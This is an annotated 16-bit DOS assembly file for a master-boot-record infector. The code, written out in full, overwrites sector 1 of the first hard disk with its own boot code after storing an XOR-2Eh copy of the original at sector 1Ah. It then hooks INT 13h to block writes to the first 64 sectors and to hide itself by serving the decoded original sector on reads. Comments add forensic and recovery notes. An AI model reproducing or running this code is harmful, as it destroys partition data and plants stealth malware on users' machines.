📄 tsr.asm
; ---------------------------------------------------------------------
; 16-bit real-mode MASM source (Intel operand order), built as a DOS
; .COM image (org 100h).
;
; Analysis summary: this is an MBR infector sample.
;   * Run from DOS: start -> BeginWrite. That path stores an XOR-2Eh copy
;     of the current sector 0/0/1 of drive 80h at sector 0/0/1Ah, then
;     overwrites sector 0/0/1 with the bytes between `begin` and
;     `BeginWrite`.
;   * Run from the boot sector: `begin` executes at 0000:7C00, moves
;     itself to 0000:0600, takes 2 KB from the top of conventional
;     memory, hooks INT 13h there and finally loads the saved original
;     boot record.
; ---------------------------------------------------------------------
code segment
assume cs:code,ds:code,es:code
org 100h
Main PROC FAR
start:
jmp BeginWrite ; DOS entry point: skip the boot-time code, go to the installer
begin:
; Boot-time entry. Everything from here up to BeginWrite is what the
; installer writes into sector 1, so all absolute targets below are
; rebased by hand as (label - begin + 0600h).
; push es
; push ds
mov cx,0100h ; 100h words = 512 bytes (one sector)
mov di,0600h ; destination 0000:0600
mov ax,0000h
mov ds,ax
mov es,ax
mov si,7c00h ; source 0000:7C00, where this sector was loaded
cld
REP MOVSW ; copy the whole sector down to 0000:0600
mov bx,offset rrr444rr - offset begin + 0600h ; address of rrr444rr inside the relocated copy
jmp bx ; near jump: continues in the copy (assumes CS = 0000h here - TODO confirm)
rrr444rr:
; Boot-time installer, running from the copy at 0000:0600.
; Steps: shrink the BIOS base-memory size by 2 KB, save the current
; INT 13h vector at ES:0000, point the vector at ES:0010, then copy the
; resident handler to ES:0010.
; Forensic note: a lowered word at 0000:0413 together with an INT 13h
; vector of the form xxxx:0010 just below the top of conventional
; memory are the in-memory artefacts of this hook.
xor ax,ax
mov ds,ax ; DS = 0000h (IVT and BIOS data area)
push ds ; saved so DS = 0 can be restored before the copy below
;;;;;;;;;;;;;
mov ax,word ptr ds:[413h] ; BIOS data area word at 0000:0413 = base memory size in KB
dec ax
dec ax ; minus 2 KB in total
mov ds:[413h],ax ; publish the reduced size
MOV CL,06h ; KB * 64 = paragraphs
SHL AX,CL ;ax=9f80h (for a 640 KB machine)
MOV ES,AX ; ES = segment of the reserved 2 KB block (new home of the INT 13h handler)
;;;;;;;;;;;;;;;
MOV AX,ds:[004Ch] ; INT 13h offset from the interrupt vector table (13h * 4 = 4Ch)
mov di,0000h
mov word ptr es:[di],ax ; ES:0000 = original INT 13h offset
MOV AX,ds:[004Eh] ; INT 13h segment
add di,02h
mov word ptr es:[di],ax ; ES:0002 = original INT 13h segment
;;;;;;;;;;;;;
cli ; no interrupts while the two vector words are inconsistent
MOV AX,010h ; write the new INT 13h location into the vector table: offset 0010h
MOV word ptr ds:[004Ch],ax
MOV AX,ES
MOV word ptr ds:[004Eh],ax ; ... segment = reserved block
sti
;;;;;;;;;;;;;;
mov cx,offset NewInt13hCodeEnd - offset NewInt13hCodeBegin ; handler length in bytes
pop ds ; DS = 0000h again (pushed above)
mov si,offset NewInt13hCodeBegin - offset begin + 0600h ; handler inside the relocated copy
mov di,0010h ; destination ES:0010, right after the saved vector
rep movsb ; move the handler to high memory
mov bx,offset NewInt13hCodeEnd - offset begin + 0600h ; continue after the handler body, still in the 0600h copy
jmp bx
NewInt13hCodeBegin:
; Resident INT 13h hook. It runs from <reserved segment>:0010; the
; original vector is stored at CS:0000 and is reached with a simulated
; interrupt (pushf + far call).
; In:  standard INT 13h registers (AH = function, CH/CL = cylinder/sector,
;      DH = head, DL = drive, ES:BX = buffer).
; Behaviour:
;   1. AH=03h (write), DX=0080h, CX<=40h : request is dropped, the
;      original handler is never called.
;   2. AH=02h (read), DX=0080h, CX=0001h : caller's buffer is filled from
;      sector 1Ah and XORed with 2Eh, i.e. the saved original boot
;      record is returned instead of the real sector 1.
;   3. anything else: passed through unchanged.
; Detection note: because of (2), a read of sector 0/0/1 through this
; INT 13h chain does not show what is on disk; compare against a read
; taken outside the infected boot chain.
sti
push ds
push si
push di
; push ax
push cx
push dx
cmp ah,03h ; write sectors?
jne NotWriteHarddsik
cmp dx,080h ; DH = 0 (head 0), DL = 80h (first hard disk)
jne NotWriteHarddsik
cmp cx,40h ; CH = 0 and CL <= 40h
jbe NewInt13Exit ; a write to the first 64 sectors: leave the interrupt without writing
; (the caller gets its AX back unchanged and the flags left by the cmp above)
NotWriteHarddsik:
cmp ah,02h ; read sectors?
jne ReadHarddiskNatural
cmp dx,080h
jne ReadHarddiskNatural
cmp cx,001h ; is this a read of the boot record position (cylinder 0, sector 1)?
jne ReadHarddiskNatural
pushf
call dword ptr cs:[0000h] ; perform the caller's read as requested
push ax ; keep that call's AX (status/count) for the caller
mov ax,0201h ; read, 1 sector
;;;;;;;;;;;;;;;
; read the original boot record
mov cx,01ah ; sector 1Ah holds the encrypted copy of the original MBR
pushf
call dword ptr cs:[0000h] ; overwrites the first 512 bytes at ES:BX (DX assumed preserved by the first call)
;;;;;;;;;;;;; ; decrypt the copy that was just read
push di
push cx
push ax
mov di,bx ; DI = start of the caller's buffer
mov cx,200h ; 512 bytes
; cld
GetRightMBRInfo:
mov al,es:[di]
xor al,2eh ; single-byte XOR key 2Eh
mov byte ptr es:[di],al
inc di
loop GetRightMBRInfo
pop ax
pop cx
pop di
pop ax ; AX from the first (caller-requested) read
;;;;;;;;;;;;;;;;;;;
pop dx
pop cx
; pop ax
pop di
pop si
pop ds
retf 0002 ; far return that discards the FLAGS word pushed by INT, so current flags reach the caller
ReadHarddiskNatural:
pushf
call dword ptr cs:[0000h] ; pass-through to the original handler
NewInt13Exit:
pop dx
pop cx
; pop ax
pop di
pop si
pop ds
retf 0002 ; as above: return with the current flags
NewInt13hCodeEnd:
; End marker of the resident handler and last boot-time step (still
; executing from the 0600h copy). It issues a one-sector read of 0/0/1 on
; drive 80h into 0000:7C00 and jumps there. The request matches the
; AH=02h / DX=0080h / CX=0001h case of the hook installed above, so the
; buffer ends up holding the decoded original boot record from sector 1Ah.
push ds
pop es ; ES = DS (0000h, restored by the pop in the installer)
mov ax,201h ; AH=02h read, AL=1 sector
mov bx,7c00h ; buffer ES:7C00
mov cx,001h ; cylinder 0, sector 1
mov dx,080h ; head 0, drive 80h
int 13h
jmp bx ; hand control to the loaded boot record at 7C00h (no error check on the read)
BeginWrite:
; DOS-side installer (reached from `start`). None of the three INT 13h
; calls below checks the carry flag for errors.
; Incident-response note: after this runs, the original boot record
; (including its partition table) exists only as an XOR-2Eh copy in
; sector 0/0/1Ah of drive 80h; XORing those 512 bytes with 2Eh again
; yields the original sector.
;;;;;;;;;;;;;;;;;;;;;;;;;;;
; store an encrypted copy of the genuine MBR at sector 1Ah
mov ax,201h ; read 1 sector
mov bx,2000h ; buffer ES:2000h (same segment as DS in a .COM image)
mov cx,001h ; cylinder 0, sector 1
mov dx,080h ; head 0, drive 80h
int 13h
mov di,bx
mov cx,200h ; 512 bytes
cld
EncryptMBR:
mov al,[di]
xor al,2eh ; same single-byte key the resident handler uses
mov byte ptr [di],al
inc di
loop EncryptMBR
mov ax,301h ; write 1 sector
mov bx,2000h
mov cx,01ah ; cylinder 0, sector 1Ah
mov dx,080h
int 13h
;;;;;;;;;;;;;;;;;;;;;;;;
mov cx,offset BeginWrite - offset begin ; length of the boot-time code
mov di,offset buf
mov si,offset begin
rep movsb ; buf = boot-time code, then the zero fill, then the 55h,0AAh bytes after it
; NOTE(review): nothing from the old sector is merged into buf, so the
; partition-table area of the sector written below holds no original data.
mov ax,301h ; write 1 sector
mov bx,offset buf
mov cx,001h ; cylinder 0, sector 1
mov dx,080h
int 13h
; execution falls through into show11, which follows Main ENDP
Main ENDP
; show11: prints the '$'-terminated string `showchar` with DOS function
; 09h and terminates the program with INT 20h. It is entered by
; fall-through from the end of Main; no call to it is visible in this file.
show11 proc near
mov ax,cs
mov ds,ax ; DS = CS so that DS:DX addresses showchar
mov ah,09h ; DOS: print string at DS:DX up to '$'
mov dx,offset showchar
int 21h
int 20h ;ret
show11 endp
showchar db 'success!','$' ; message printed by show11 ('$' terminates it for DOS function 09h)
buf db 510 dup(0) ; staging buffer for the sector image written by BeginWrite
db 55h,0aah ; boot signature bytes at offsets 510-511 of that image
code ends
end Main